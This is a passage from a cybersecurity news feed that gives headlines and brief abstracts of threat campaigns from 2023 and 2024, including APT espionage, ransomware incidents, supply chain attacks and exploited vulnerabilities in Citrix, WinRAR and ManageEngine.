Bloody Wolf Strikes Organizations in Kazakhstan with STRRAT Commercial Malware Full Text
Abstract
The STRRAT malware, sold for $80, allows attackers to take control of computers and steal data. Attackers use phishing emails pretending to be from government agencies to trick victims into downloading malicious files. (BI.ZONE)
August 6, 2024
North Korean Hackers Exploit VPN Update Flaw to Install Malware Full Text
Abstract
North Korean hackers exploited a VPN software update flaw to install malware and breach networks, as warned by South Korea's National Cyber Security Center. The threat groups involved in these activities are Kimsuky (APT43) and Andariel (APT45). (Bleeping Computer)
August 6, 2024
Ransomware Gang Targets IT Workers With New SharpRhino Malware Full Text
Abstract
The Hunters International ransomware group is using a new C# remote access trojan named SharpRhino to target IT workers and breach corporate networks. It is distributed through a typosquatting site posing as Angry IP Scanner's website. (Bleeping Computer)
August 5, 2024
Surge in Magniber Ransomware Attacks Impact Home Users Worldwide Full Text
Abstract
Unlike other ransomware groups targeting businesses, Magniber focuses on individuals. Victims report their devices getting infected after running software cracks. Ransom demands start at $1,000 and escalate to $5,000 if not paid within three days. (Bleeping Computer)
August 5, 2024
Linux Kernel Impacted by New SLUBStick Cross-Cache Attack Full Text
Abstract
A new Linux Kernel attack called SLUBStick has a 99% success rate in turning a limited heap vulnerability into a powerful memory read-and-write capability, allowing for privilege escalation and container escape. (Bleeping Computer)
August 3, 2024
Attacks on Bytecode Interpreters Conceal Malicious Injection Activity Full Text
Abstract
This type of attack, known as Bytecode Jiu-Jitsu, takes advantage of the fact that interpreters do not require execution privilege for bytecode, making it difficult for security tools to detect. (Dark Reading)
August 1, 2024
Ransomware Attack On Service Provider Hits 300 Small Banks Across India Full Text
Abstract
The attack targeted C-Edge Technologies, a provider of banking systems for these banks. As a precaution, the National Payment Corporation of India (NPCI) has isolated these banks from the broader payment network to contain the attack. (NDTV)
July 31, 2024
Cybercriminals Target Polish Businesses with Agent Tesla and Formbook Malware Delivered by ModiLoader Full Text
Abstract
Cybercriminals targeted Polish businesses with Agent Tesla and Formbook malware through widespread phishing campaigns in May 2024. Small and medium-sized businesses (SMBs) in Poland, Italy, and Romania have been affected. (WeLiveSecurity)
July 30, 2024
SideWinder Utilizes New Infrastructure to Target Ports and Maritime Facilities in the Mediterranean Sea Full Text
Abstract
The recent attacks by the SideWinder APT group use phishing lures related to emotional topics like sexual harassment and salary cuts to trick victims into opening booby-trapped Microsoft Word documents. (BlackBerry)
July 27, 2024
Unveiling the Latest Banking Trojan Threats in Latin America Full Text
Abstract
The malicious Chrome extension campaign in LATAM involves infecting victims through phishing websites and installing rogue extensions to steal sensitive information. The extensions mimic Google Drive, giving them access to a wide range of user data. (Security Intelligence)
July 26, 2024
Belarus-linked Hackers Target Ukrainian Organizations with PicassoLoader Malware Full Text
Abstract
GhostWriter, also known as UAC-0057, used PicassoLoader and Cobalt Strike Beacon to infect victims, including local government offices and groups associated with USAID’s Hoverla project. (The Record)
July 25, 2024
North Korean Hacker Group Targeting Healthcare, Energy Sectors Full Text
Abstract
North Korean hackers, specifically the Andariel hacking group, are now targeting the healthcare, energy, and financial sectors according to a Mandiant report. This group is believed to be associated with North Korea's Reconnaissance General Bureau. (BankInfoSecurity)
July 22, 2024
Attackers Abuse Swap File to Steal Credit Cards Full Text
Abstract
Attackers recently abused the swap file in a Magento e-commerce site to steal credit card information. Despite multiple cleanup attempts, the malware persisted until analysts discovered it. (Sucuri)
July 22, 2024
Fake CrowdStrike Fixes Target Companies With Malware, Data Wipers Full Text
Abstract
Malicious campaigns have emerged, including one targeting BBVA bank customers with a fake CrowdStrike Hotfix that installs remote access tools. Another attack involves a data wiper distributed under the guise of a CrowdStrike update. (Bleeping Computer)
July 20, 2024
OilAlpha Malicious Applications Target Humanitarian Aid Groups Operating in Yemen Full Text
Abstract
The attacks, linked to a group called OilAlpha, involved malicious mobile apps and targeted CARE International, Norwegian Refugee Council (NRC), and Saudi Arabian King Salman Humanitarian Aid and Relief Centre. (Recorded Future)
July 20, 2024
North Korean Hackers May Have Attacked Indian Crypto Exchange WazirX Full Text
Abstract
Indian crypto exchange WazirX disclosed a loss of virtual assets worth more than $230 million due to a cyber attack linked to North Korea. The attack targeted a multi-signature wallet with six signatories, leading to a breach in security measures. (The Register)
July 19, 2024
New Hacker Group Uses Open-Source Tools to Spy on Entities in Asia-Pacific Region Full Text
Abstract
Targets of TAG-100's attacks include intergovernmental and diplomatic entities in the Asia-Pacific region, religious organizations in the U.S. and Taiwan, as well as a political party supporting an investigation into the Chinese government. (The Record)
July 17, 2024
Hacktivist Groups Target Romania Amid Geopolitical Tensions Full Text
Abstract
Hacktivist groups are targeting Romania amidst geopolitical tensions, with increased DDoS attacks observed by security researchers. These attacks involve CyberDragon and the Cyber Army of Russia. (Infosecurity Magazine)
July 16, 2024
Void Banshee Targets Windows Users Through MSHTML Flaw to Spread Atlantida Stealer Full Text
Abstract
The vulnerability, CVE-2024-38112, was observed by Trend Micro in May 2024, being exploited as part of a multi-stage attack chain using internet shortcut files. The campaign has been active throughout 2024. (Cyware)
July 16, 2024
ShadowRoot Ransomware Targets Turkish Businesses Full Text
Abstract
The attackers target Turkish businesses with this ransomware campaign, distributing it via email addresses like Kurumsal[.]tasilat[@]internet[.]ru. The malware payload is hosted on a compromised GitHub account. (Cyware)
July 12, 2024
Japanese Space Agency Spots Unspecified Zero-Day Attacks Full Text
Abstract
JAXA was targeted with zero-day exploits during its investigation with Microsoft into a 2023 cyberattack. The attack mainly affected its Active Directory system, prompting JAXA to shut down networks to prevent data compromise. (The Register)
July 12, 2024
Japan Warns of Attacks Linked to North Korean Kimsuky Hackers Full Text
Abstract
The attacks were detected earlier this year, with indicators of compromise shared by AhnLab Security Intelligence Center. The attackers initiate their attacks with phishing emails containing malicious attachments disguised as documents. (Bleeping Computer)
August 31, 2023
Earth Estries Group Targets Government and IT Organizations Full Text
Abstract
A new cyberespionage campaign called Earth Estries has been discovered, targeting governments and organizations in the technology sector. Active since at least 2020, the campaign shows similarities with another APT group called FamousSparrow. It is essential for organizations to track and analyze t ... (Cyware)
August 31, 2023
VMConnect Supply Chain Attack Continues, Evidence Points to North Korea Full Text
Abstract
The recently discovered malicious Python packages, such as tablediter, request-plus, and requestspro, are believed to be a continuation of the VMConnect campaign attributed to North Korean threat actors. (Cyware)
August 31, 2023
Earth Estries’ Espionage Campaign Targets Governments and Tech Titans Across Continents Full Text
Abstract
A hacking outfit nicknamed Earth Estries has been attributed to a new, ongoing cyber espionage campaign targeting government and technology industries based in the Philippines, Taiwan, Malaysia, South Africa, Germany, and the U.S. "The threat actors behind Earth Estries are working with high-level resources and functioning with sophisticated skills and experience in cyber espionage and illicit activities," Trend Micro researchers Ted Lee, Lenart Bermejo, Hara Hiroaki, Leon M Chang, and Gilbert Sison said. Active since at least 2020, Earth Estries is said to share tactical overlaps with another nation-state group tracked as FamousSparrow, which was first exposed by ESET in 2021 as exploiting ProxyLogon flaws in Microsoft Exchange Server to penetrate hospitality, government, engineering, and legal sectors. It's worth pointing out that commonalities have also been unearthed between FamousSparrow and UNC4841, an uncategorized activity cluster held responsible for ... (The Hacker News)
August 29, 2023
Chinese Hacking Group Exploits Barracuda Zero-Day to Target Government, Military, and Telecom Full Text
Abstract
A suspected Chinese-nexus hacking group exploited a recently disclosed zero-day flaw in Barracuda Networks Email Security Gateway (ESG) appliances to breach government, military, defense and aerospace, high-tech industry, and telecom sectors as part of a global espionage campaign. Mandiant, which is tracking the activity under the name UNC4841, described the threat actor as "highly responsive to defensive efforts" and capable of actively tweaking their modus operandi to maintain persistent access to targets. "UNC4841 deployed new and novel malware designed to maintain presence at a small subset of high priority targets that it compromised either before the patch was released, or shortly following Barracuda's remediation guidance," the Google-owned threat intelligence firm said in a new technical report published today. Almost a third of the identified affected organizations are government agencies. Interestingly enough, some of the earliest compromises ... (The Hacker News)
August 28, 2023
Attacks on Citrix NetScaler systems linked to ransomware actor Full Text
Abstract
A threat actor believed to be tied to the FIN8 hacking group exploits the CVE-2023-3519 remote code execution flaw to compromise unpatched Citrix NetScaler systems in domain-wide attacks. (BleepingComputer)
August 28, 2023
Signs of Malware Attack Targeting Rust Developers Found on Crates.io Full Text
Abstract
The Rust Foundation was notified and it quickly removed the packages and locked the uploader’s account. GitHub was also notified and took action against the associated account. (Cyware)
August 27, 2023
Lazarus Exploits ManageEngine to Deploy QuiteRAT Full Text
Abstract
The Lazarus group was associated with a new campaign against healthcare entities in Europe and the U.S. In this campaign, the attackers exploited a ManageEngine ServiceDesk vulnerability (CVE-2022-47966) to distribute the QuiteRAT malware. The malware has many capabilities similar to MagicRAT, anot ... (Cyware)
August 25, 2023
China-based ‘Flax Typhoon’ hackers targeting Taiwan govt: Microsoft Full Text
Abstract
The activities observed suggest the threat actor intends to perform espionage and maintain access to organizations across a broad range of industries for as long as possible. (Cyware)
August 24, 2023
Lazarus APT exploits Zoho ManageEngine flaw to target an Internet backbone infrastructure provider Full Text
Abstract
The North Korea-linked Lazarus group exploits a critical flaw in Zoho ManageEngine ServiceDesk Plus to deliver the QuiteRAT malware. The North Korea-linked APT group Lazarus has been exploiting a critical vulnerability, tracked as CVE-2022-47966, ... (Security Affairs)
August 24, 2023
WinRAR Security Flaw Exploited in Zero-Day Attacks to Target Traders Full Text
Abstract
A recently patched security flaw in the popular WinRAR archiving software has been exploited as a zero-day since April 2023, new findings from Group-IB reveal. The vulnerability, cataloged as CVE-2023-38831, allows threat actors to spoof file extensions, thereby making it possible to launch malicious scripts contained within an archive that masquerades as seemingly innocuous image or text files. It was addressed in version 6.23 released on August 2, 2023, alongside CVE-2023-40477. In attacks discovered by the Singapore-based firm in July 2023, specially crafted ZIP or RAR archive files distributed via trading-related forums such as Forex Station have been used to deliver a variety of malware families such as DarkMe, GuLoader, and Remcos RAT. "After infecting devices, the cybercriminals withdraw money from broker accounts," Group-IB malware analyst Andrey Polovinkin said, adding as many as 130 traders' devices have been compromised as part of the campaign. T ... (The Hacker News)
August 24, 2023
More than 3,000 Openfire servers exposed to attacks using a new exploit Full Text
Abstract
The experts pointed out that the bug has been exploited for more than two months, but has yet to be added to the CISA KEV catalog. The researchers discovered approximately 6,300 servers on Shodan and a bit more using the Censys search engine. (Cyware)
August 23, 2023
Ransomware Intrusion Impacts All Servers of Danish Cloud Provider Full Text
Abstract
The attack occurred on August 18, and since then, efforts have been made to restore the data, but it has proved difficult. CloudNordic has stated that it will not pay the ransom demanded by the hackers. (Cyware)
August 22, 2023
Carderbee Attacks: Hong Kong Organizations Targeted via Malicious Software Updates Full Text
Abstract
A previously undocumented threat cluster has been linked to a software supply chain attack targeting organizations primarily located in Hong Kong and other regions in Asia. The Symantec Threat Hunter Team, part of Broadcom, is tracking the activity under its insect-themed moniker Carderbee. The attacks, per the cybersecurity firm, leverage a trojanized version of a legitimate software called EsafeNet Cobra DocGuard Client to deliver a known backdoor called PlugX (aka Korplug) on victim networks. "In the course of this attack, the attackers used malware signed with a legitimate Microsoft certificate," the company said in a report shared with The Hacker News. The use of Cobra DocGuard Client to pull off a supply chain attack was previously highlighted by ESET in its quarterly Threat Report this year, detailing a September 2022 intrusion in which an unnamed gambling company in Hong Kong was compromised via a malicious update pushed by the software. The same company ... (The Hacker News)
August 22, 2023
A cyber attack hit the Australian software provider Energy One Full Text
Abstract
The Australian software provider Energy One announced it was hit by a cyberattack last week that affected certain corporate systems in Australia and the UK. The Australian software provider Energy One announced that a cyberattack hit certain corporate ... (Security Affairs)
August 21, 2023
New HiatusRAT campaign targets Taiwan and U.S. military procurement system Full Text
Abstract
HiatusRAT malware operators resurfaced with a new wave of attacks targeting Taiwan-based organizations and a U.S. military procurement system. In March 2023, Lumen Black Lotus Labs researchers uncovered a sophisticated campaign called “HiatusRAT” ... (Security Affairs)
August 19, 2023
Germany’s National Bar Association Investigating Ransomware Attack Full Text
Abstract
The German Federal Bar (BRAK) Association discovered the attack on August 2. The group is an umbrella organization overseeing 28 regional bars across Germany and representing about 166,000 lawyers nationally and internationally. (Cyware)
August 18, 2023
New Wave of Attack Campaign Targeting Zimbra Email Users for Credential Theft Full Text
Abstract
A new "mass-spreading" social engineering campaign is targeting users of the Zimbra Collaboration email server with an aim to collect their login credentials for use in follow-on operations. The activity, active since April 2023 and still ongoing, targets a wide range of small and medium businesses and governmental entities, most of which are located in Poland, Ecuador, Mexico, Italy, and Russia. It has not been attributed to any known threat actor or group. "Initially, the target receives an email with a phishing page in the attached HTML file," ESET researcher Viktor Šperka said in a report. "The email warns the target about an email server update, account deactivation, or similar issue and directs the user to click on the attached file." The messages also spoof the from address to appear as if they are coming from a Zimbra administrator in a likely attempt to convince the recipients into opening the attachment. The HTML file contains a Zimbra lo ... (The Hacker News)
August 18, 2023
Cleveland City School District Suffers Ransomware Attack Full Text
Abstract
Cleveland City Schools say they are dealing with the aftermath of a ransomware attack Tuesday. They say less than 5% of faculty and staff devices were affected. A CCS spokesperson says their printers are down. (Cyware)
August 17, 2023
Stealthy LABRAT Operation Runs Cryptojacking and Proxyjacking Campaign Targeting GitLab Full Text
Abstract
The Sysdig Threat Research Team (TRT) recently discovered a new, financially motivated operation, dubbed LABRAT. This operation set itself apart from others due to the attacker’s emphasis on stealth and defense evasion in their attacks. (Cyware)
August 17, 2023
China-Linked Bronze Starlight Group Targeting Gambling Sector with Cobalt Strike Beacons Full Text
Abstract
An ongoing cyber attack campaign originating from China is targeting the Southeast Asian gambling sector to deploy Cobalt Strike beacons on compromised systems. Cybersecurity firm SentinelOne said the tactics, techniques, and procedures point to the involvement of a threat actor tracked as Bronze Starlight (aka Emperor Dragonfly or Storm-0401), which has been linked to the use of short-lived ransomware families as a smokescreen to conceal its espionage motives. "The threat actors abuse Adobe Creative Cloud, Microsoft Edge, and McAfee VirusScan executables vulnerable to DLL hijacking to deploy Cobalt Strike beacons," security researchers Aleksandar Milenkoski and Tom Hegel said in an analysis published today. It also bears noting that the campaign exhibits overlaps with an intrusion set monitored by ESET under the name Operation ChattyGoblin. This activity, in turn, shares commonalities with a supply chain attack that came to light last year leveraging a troja ... (The Hacker News)
August 17, 2023
A massive campaign delivered a proxy server application to 400,000 Windows systems Full Text
Abstract
Researchers discovered a massive campaign that delivered a proxy server application to at least 400,000 Windows systems. AT&T Alien Labs researchers uncovered a massive campaign that delivered a proxy server application to at least 400,000 Windows ... (Security Affairs)
August 17, 2023
New LABRAT Campaign Exploits GitLab Flaw for Cryptojacking and Proxyjacking Activities Full Text
Abstract
A new, financially motivated operation dubbed LABRAT has been observed weaponizing a now-patched critical flaw in GitLab as part of a cryptojacking and proxyjacking campaign. "The attacker utilized undetected signature-based tools, sophisticated and stealthy cross-platform malware, command-and-control (C2) tools which bypassed firewalls, and kernel-based rootkits to hide their presence," Sysdig said in a report shared with The Hacker News. "Furthermore, the attacker abused a legitimate service, TryCloudflare, to obfuscate their C2 network." Proxyjacking allows the attacker to rent the compromised host out to a proxy network, making it possible to monetize the unused bandwidth. Cryptojacking, on the other hand, refers to the abuse of the system resources to mine cryptocurrency. A notable aspect of the campaign is the use of compiled binaries written in Go and .NET to fly under the radar, with LABRAT also providing backdoor access to the infected systems. (The Hacker News)
August 14, 2023
Ongoing Xurum attacks target Magento 2 e-stores Full Text
Abstract
Experts warn of ongoing attacks, dubbed Xurum, targeting e-commerce websites using Adobe's Magento 2 CMS. Akamai researchers warn of ongoing attacks, dubbed Xurum, targeting e-commerce websites running the Magento 2 CMS. The attackers are actively ... (Security Affairs)
August 14, 2023
Charming Kitten Targets Iranian Dissidents with Advanced Cyber Attacks Full Text
Abstract
Germany's Federal Office for the Protection of the Constitution (BfV) has warned of cyber attacks targeting Iranian persons and organizations in the country since the end of 2022. "The cyber attacks were mainly directed against dissident organizations and individuals – such as lawyers, journalists, or human rights activists – inside and outside Iran," the agency said in an advisory. The intrusions have been attributed to a threat actor called Charming Kitten, which is also tracked under the names APT35, Mint Sandstorm, TA453 and Yellow Garuda. While Iranian nation-state actors lag behind their Russian and Chinese counterparts in sophistication, they have demonstrated a continued advancement of tools and techniques, adding an arsenal of custom malware to facilitate information gathering and rapidly exploiting n-day security flaws to obtain initial access. Charming Kitten, in particular, has a long, storied history of leveraging elaborate social engineering and ... (The Hacker News)
August 12, 2023
Power Generator in South Africa hit with DroxiDat and Cobalt Strike Full Text
Abstract
Threat actors employed a new variant of the SystemBC malware, named DroxiDat, in attacks aimed at African critical infrastructure. Researchers from Kaspersky's Global Research and Analysis Team (GReAT) reported that an unknown threat actor used a new variant ... (Security Affairs)
August 11, 2023
Researchers Uncover Years-Long Cyber Espionage on Foreign Embassies in Belarus Full Text
Abstract
A hitherto undocumented threat actor operating for nearly a decade and codenamed MoustachedBouncer has been attributed to cyber espionage attacks aimed at foreign embassies in Belarus. "Since 2020, MoustachedBouncer has most likely been able to perform adversary-in-the-middle (AitM) attacks at the ISP level, within Belarus, in order to compromise its targets," ESET security researcher Matthieu Faou said, describing the group as skilled and advanced. The adversary, active since at least 2014, is assessed to be aligned with Belarusian interests, likely employing a lawful interception system such as SORM to conduct its AitM attacks as well as deploy disparate tools called NightClub and Disco. Both the Windows malware frameworks support additional spying plugins including a screenshotter, an audio recorder, and a file stealer. The oldest sample of NightClub dates back to November 19, 2014, when it was uploaded to VirusTotal from Ukraine. Embassy staff from four differ ... (The Hacker News)
August 11, 2023
Charming Kitten Hackers Target Iranian Dissidents in Germany Full Text
Abstract
The Federal Office for the Protection of the Constitution (BfV) reported it had found concrete attempts by the group known as Charming Kitten to target the Iranian opposition and exiles based in Germany. (Cyware)
August 11, 2023
New SystemBC Malware Variant Targets Southern African Power Company Full Text
Abstract
An unknown threat actor has been linked to a cyber attack on a power generation company in southern Africa with a new variant of the SystemBC malware called DroxiDat as a precursor to a suspected ransomware attack. "The proxy-capable backdoor was deployed alongside Cobalt Strike Beacons in a South African nation's critical infrastructure," Kurt Baumgartner, principal security researcher at Kaspersky's Global Research and Analysis Team (GReAT), said. The Russian cybersecurity company said the attack, which took place in late March 2023, was in its early stages and involved the use of DroxiDat to profile the system and proxy network traffic using the SOCKS5 protocol to and from command-and-control (C2) infrastructure. SystemBC is a C/C++-based commodity malware and remote administrative tool that was first seen in 2019. Its main feature is to set up SOCKS5 proxies on victim computers that can then be used by threat actors to tunnel malicious traffic associ ... (The Hacker News)
August 10, 2023
New Attack Alert: Freeze[.]rs Injector Weaponized for XWorm Malware Attacks Full Text
Abstract
Malicious actors are using a legitimate Rust-based injector called Freeze[.]rs to deploy a commodity malware called XWorm in victim environments. The novel attack chain, detected by Fortinet FortiGuard Labs on July 13, 2023, is initiated via a phishing email containing a booby-trapped PDF file. It has also been used to introduce Remcos RAT by means of a crypter called SYK Crypter, which was first documented by Morphisec in May 2022. "This file redirects to an HTML file and utilizes the 'search-ms' protocol to access an LNK file on a remote server," security researcher Cara Lin said. "Upon clicking the LNK file, a PowerShell script executes Freeze[.]rs and SYK Crypter for further offensive actions." Freeze[.]rs, released on May 4, 2023, is an open-source red teaming tool from Optiv that functions as a payload creation tool used for circumventing security solutions and executing shellcode in a stealthy manner. "Freeze[.]rs utilizes multiple tec ... (The Hacker News)
August 10, 2023
Pro-Russian Hacker Group Claims Attacks on French, Dutch Websites
Abstract
The latest attacks come a week after the group, NoName057(16), hit Spanish and Italian government and private sector organizations with distributed denial-of-service (DDoS) attacks.Cyware
August 09, 2023
China-Linked Hackers Strike Worldwide: 17 Nations Hit in 3-Year Cyber Campaign
Abstract
Hackers associated with China's Ministry of State Security (MSS) have been linked to attacks in 17 different countries in Asia, Europe, and North America from 2021 to 2023. Cybersecurity firm Recorded Future attributed the intrusion set to a nation-state group it tracks under the name RedHotel (previously Threat Activity Group-22 or TAG-22), which overlaps with a cluster of activity broadly monitored as Aquatic Panda, Bronze University, Charcoal Typhoon, Earth Lusca, and Red Scylla (or Red Dev 10). Active since 2019, the prolific actor has targeted prominent sectors including academia, aerospace, government, media, telecommunications, and research. A majority of the victims during the period were government organizations. "RedHotel has a dual mission of intelligence gathering and economic espionage," the cybersecurity company said, calling out its persistence, operational intensity, and global reach. "It targets both government entities for...The Hacker News
August 9, 2023
Big Cyberespionage Attack Against Japan Attributed to China
Abstract
Classified military networks run by Japan reportedly suffered a massive breach in 2020 at the hands of a Chinese cyberespionage group that proved tough to eject even after being discovered.Cyware
August 8, 2023
Ukrainian State Agencies Targeted with Open-Source Malware MerlinAgent
Abstract
In early August, an unidentified threat actor tracked as UAC-0154 sent malicious emails to its targets, purportedly containing security tips from Ukraine's computer emergency response team (CERT-UA).Cyware
August 07, 2023
North Korean Hackers Target Russian Missile Engineering Firm
Abstract
Two different North Korean nation-state actors have been linked to a cyber intrusion against the major Russian missile engineering company NPO Mashinostroyeniya. Cybersecurity firm SentinelOne said it identified "two instances of North Korea related compromise of sensitive internal IT infrastructure," including a case of an email server compromise and the deployment of a Windows backdoor dubbed OpenCarrot. The breach of the Linux email server has been attributed to ScarCruft. OpenCarrot, on the other hand, is a known implant previously identified as used by the Lazarus Group. The attacks were flagged in mid-May 2022. A rocket design bureau based in Reutov, NPO Mashinostroyeniya was sanctioned by the U.S. Treasury Department in July 2014 in connection to "Russia's continued attempts to destabilize eastern Ukraine and its ongoing occupation of Crimea." While both ScarCruft (aka APT37) and the Lazarus Group are affiliated with North Korea, it's w...The Hacker News
August 5, 2023
Reptile Rootkit employed in attacks against Linux systems in South Korea
Abstract
Researchers observed threat actors that are using an open-source rootkit called Reptile in attacks aimed at systems in South Korea. Reptile is an open-source kernel module rootkit that was designed to target Linux systems, unlike other rootkits,...Security Affairs
August 4, 2023
Attackers use dynamic code loading to bypass Google Play store’s malware detections
Abstract
Threat actors rely on the 'versioning' technique to evade malware detections of malicious code uploaded to the Google Play Store. Google Cybersecurity Action Team (GCAT) revealed that threat actors are using a technique called versioning to evade...Security Affairs
August 03, 2023
Hundreds of Citrix NetScaler ADC and Gateway Servers Hacked in Major Cyber Attack
Abstract
Hundreds of Citrix NetScaler ADC and Gateway servers have been breached by malicious actors to deploy web shells, according to the Shadowserver Foundation. The non-profit said the attacks take advantage of CVE-2023-3519, a critical code injection vulnerability that could lead to unauthenticated remote code execution. The flaw, patched by Citrix last month, carries a CVSS score of 9.8. The largest number of impacted IP addresses is based in Germany, followed by France, Switzerland, Italy, Sweden, Spain, Japan, China, Austria, and Brazil. The exploitation of CVE-2023-3519 to deploy web shells was previously disclosed by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), which said the attack was directed against an unnamed critical infrastructure organization in June 2023. The disclosure comes as GreyNoise said it detected three IP addresses attempting to exploit CVE-2023-24489 (CVSS score: 9.1), another critical flaw in Citrix ShareFile software that...The Hacker News
August 3, 2023
Russian Hacker Group NoName057(16) Claims Attacks on Italian Banks, Government Agencies
Abstract
A pro-Russian hacking group has claimed responsibility for cyberattacks on Italian banks, businesses, and government agencies, which flooded networks and disrupted services.Cyware
August 01, 2023
European Bank Customers Targeted in SpyNote Android Trojan Campaign
Abstract
Various European customers of different banks are being targeted by an Android banking trojan called SpyNote as part of an aggressive campaign detected in June and July 2023. "The spyware is distributed through email phishing or smishing campaigns and the fraudulent activities are executed with a combination of remote access trojan (RAT) capabilities and vishing attack," Italian cybersecurity firm Cleafy said in a technical analysis released Monday. SpyNote, also called SpyMax, is similar to other Android banking Trojans in that it requires Android's accessibility permissions in order to grant itself other necessary permissions and gather sensitive data from infected devices. What makes the malware strain notable is its dual function as spyware and as a tool for bank fraud. The attack chains commence with a bogus SMS message urging users to install a banking app by clicking on the accompanying link, redirecting the victim to the legitimate TeamViewer QuickSupport a...The Hacker News
August 1, 2023
Meow Campaign Reaches Misconfigured Jupyter Notebook Instances
Abstract
The "Meow" campaign, targeting unsecured databases, has resurfaced, with the threat actor using misconfigured Jupyter Notebook instances to gather information and delete databases.Cyware
July 31, 2023
Patchwork Hackers Target Chinese Research Organizations Using EyeShell Backdoor
Abstract
Threat actors associated with the hacking crew known as Patchwork have been spotted targeting universities and research organizations in China as part of a recently observed campaign. The activity, according to KnownSec 404 Team, entailed the use of a backdoor codenamed EyeShell. Patchwork, also known by the names Operation Hangover and Zinc Emerson, is suspected to be a threat group that operates on behalf of India. Active since at least December 2015, the outfit mounts narrowly focused attack chains that tend to single out Pakistan and China with custom implants such as BADNEWS via spear-phishing and watering hole attacks. The adversarial collective has been found to share tactical overlaps with other cyber-espionage groups with an Indian connection, including SideWinder and the DoNot Team. Earlier this May, Meta disclosed that it took down 50 accounts on Facebook and Instagram operated by Patchwork, which took advantage of rogue messaging apps uploaded to the...The Hacker News
July 28, 2023
Hackers Abusing Windows Search Feature to Install Remote Access Trojans
Abstract
A legitimate Windows search feature is being exploited by malicious actors to download arbitrary payloads from remote servers and compromise targeted systems with remote access trojans such as AsyncRAT and Remcos RAT. The novel attack technique, per Trellix, takes advantage of the "search-ms:" URI protocol handler, which offers the ability for applications and HTML links to launch custom local searches on a device, and the "search:" application protocol, a mechanism for calling the desktop search application on Windows. "Attackers are directing users to websites that exploit the 'search-ms' functionality using JavaScript hosted on the page," security researchers Mathanraj Thangaraju and Sijo Jacob said in a Thursday write-up. "This technique has even been extended to HTML attachments, expanding the attack surface." In such attacks, threat actors have been observed creating deceptive emails that embed hyperlinks or HTML attachme...The Hacker News
July 28, 2023
BlueBravo Deploys GraphicalProton Backdoor Against European Diplomatic Entities
Abstract
The Russian nation-state actor known as BlueBravo has been observed targeting diplomatic entities throughout Eastern Europe with the goal of delivering a new backdoor called GraphicalProton, exemplifying the continuous evolution of the threat. The phishing campaign is characterized by the use of legitimate internet services (LIS) for command-and-control (C2) obfuscation, Recorded Future said in a new report published Thursday. The activity was observed between March and May 2023. BlueBravo, also known by the names APT29, Cloaked Ursa, and Midnight Blizzard (formerly Nobelium), is attributed to Russia's Foreign Intelligence Service (SVR), and has in the past used Dropbox, Firebase, Google Drive, Notion, and Trello to evade detection and stealthily establish communications with infected hosts. To that end, GraphicalProton is the latest addition to a long list of malware targeting diplomatic organizations after GraphicalNeutrino (aka SNOWYAMBER), HALFRIG, and QUARTERRIG.The Hacker News
July 27, 2023
Hackers Target Apache Tomcat Servers for Mirai Botnet and Crypto Mining
Abstract
Misconfigured and poorly secured Apache Tomcat servers are being targeted as part of a new campaign designed to deliver the Mirai botnet malware and cryptocurrency miners. The findings come courtesy of Aqua, which detected more than 800 attacks against its Tomcat server honeypots over a two-year time period, with 96% of the attacks linked to the Mirai botnet. Of these attack attempts, 20% (or 152) entailed the use of a web shell script dubbed "neww" that originated from 24 unique IP addresses, with 68% of them originating from a single IP address (104.248.157[.]218). "The threat actor scanned for Tomcat servers and launched a brute force attack against it, attempting to gain access to the Tomcat web application manager by trying different combinations of credentials associated with it," Aqua security researcher Nitzan Yaakov said. Upon gaining a successful foothold, the threat actors have been observed deploying a WAR file that contains a malicious web s...The Hacker News
July 25, 2023
Twelve Norwegian ministries were hacked using a zero-day vulnerability
Abstract
Threat actors exploited a zero-day flaw in third-party software in attacks against the ICT platform used by 12 Norwegian ministries. The ICT platform used by twelve ministries of the Norwegian government was hacked, and threat actors have exploited...Security Affairs
July 24, 2023
Norwegian Government Security and Service Organisation Hit by Cyberattack
Abstract
Twelve Norwegian government ministries have been hit by a cyberattack, the Norwegian government said on Monday, the latest attack to hit the public sector of Europe's largest gas supplier and NATO's northernmost member.Cyware
July 24, 2023
Banking Sector Targeted in Open-Source Software Supply Chain Attacks
Abstract
Cybersecurity researchers said they have discovered what they say are the first open-source software supply chain attacks specifically targeting the banking sector. "These attacks showcased advanced techniques, including targeting specific components in web assets of the victim bank by attaching malicious functionalities to it," Checkmarx said in a report published last week. "The attackers employed deceptive tactics such as creating a fake LinkedIn profile to appear credible and customized command-and-control (C2) centers for each target, exploiting legitimate services for illicit activities." The npm packages have since been reported and taken down. The names of the packages were not disclosed. In the first attack, the malware author is said to have uploaded a couple of packages to the npm registry in early April 2023 by posing as an employee of the target bank. The modules came with a preinstall script to activate the infection sequence. To complete the rus...The Hacker News
July 24, 2023
First Known Targeted OSS Supply Chain Attacks Against the Banking Sector
Abstract
The attackers employed deceptive tactics such as creating fake LinkedIn profiles to appear credible and using customized command and control (C2) centers for each target, exploiting legitimate services for illicit activities.Cyware
July 21, 2023
Azure AD Token Forging Technique in Microsoft Attack Extends Beyond Outlook, Wiz Reports
Abstract
The recent attack against Microsoft's email infrastructure by a Chinese nation-state actor referred to as Storm-0558 is said to have a broader scope than previously thought. According to cloud security company Wiz, the inactive Microsoft account (MSA) consumer signing key used to forge Azure Active Directory (Azure AD or AAD) tokens to gain illicit access to Outlook Web Access (OWA) and Outlook.com could also have allowed the adversary to forge access tokens for various types of Azure AD applications. This includes every application that supports personal account authentication, such as OneDrive, SharePoint, and Teams; customer applications that support the "Login with Microsoft" functionality; and multi-tenant applications in certain conditions. "Everything in the world of Microsoft leverages Azure Active Directory auth tokens for access," Ami Luttwak, chief technology officer and co-founder of Wiz, said in a statement. "An attacker with an AAD si...The Hacker News
July 21, 2023
Experts believe North Korea behind JumpCloud supply chain attack
Abstract
SentinelOne researchers attribute the recent supply chain attacks on JumpCloud to North Korea-linked threat actors. JumpCloud is a cloud-based directory service platform designed to manage user identities, devices, and applications in a seamless and secure...Security Affairs
July 21, 2023
Android SpyNote Attacks Electric and Water Public Utility Users in Japan
Abstract
A smishing campaign is targeting Japanese Android users by posing as a power and water infrastructure company and luring victims to a phishing website to download the SpyNote malware.Cyware
July 20, 2023
ALPHV/BlackCat and Clop gangs claim to have hacked cosmetics giant Estée Lauder
Abstract
The American cosmetics giant company Estée Lauder was hacked by two distinct ransomware groups, the ALPHV/BlackCat and Clop gangs. Yesterday the cybersecurity expert @sonoclaudio first alerted me about a strange circumstance, two ransomware actors,...Security Affairs
July 20, 2023
North Korean State-Sponsored Hackers Suspected in JumpCloud Supply Chain Attack
Abstract
